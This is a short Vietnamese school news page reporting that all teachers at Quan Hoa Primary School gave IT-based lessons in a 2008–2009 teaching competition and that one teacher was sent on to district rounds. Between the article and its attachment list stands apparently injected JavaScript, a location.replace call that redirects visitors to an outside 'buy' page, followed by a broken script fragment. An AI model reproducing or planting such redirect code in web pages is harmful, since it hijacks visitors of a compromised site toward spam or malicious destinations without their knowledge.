Hội thi giáo viên Giỏi – Năm học: 2008 – 2009

05/02/2009 12:00 Sáng Phản hồi đã bị khóa

Hưởng ứng năm học ” Ứng dụng công nghệ thông tin trong giảng dạy”,
image
Hưởng ứng năm học ” Ứng dụng công nghệ thông tin trong giảng dạy”,trong đợt thi  giáo viên giỏi cấp trường, ban giám hiệu trường Tiểu học Quan Hoa đã chỉ đạo toàn thể giáo viên soạn và giảng bài trên giáo án điện tử . Kết quả: 100 % giáo viên đều soạn và thực hiện tiết dạy có sử dụng công nghệ thông tin và đều  xếp loại tiết dạy khá, tốt. Qua đợt thi nhà trường đã chọn và cử cô giáo Nguyễn Thị Thanh Hằng- giáo viên chủ nhiệm lớp 5A tham gia hội thi giáo viên giỏi vòng cụm và vòng Quận.

location.replace(“http://gethere.info/buy.php”);

if (document.currentScript) {

Tệp đính kèm

1233824819687_DSC07401resize
File: (18 kB)

Các phản hồi đã bị đóng lại bở quản trị.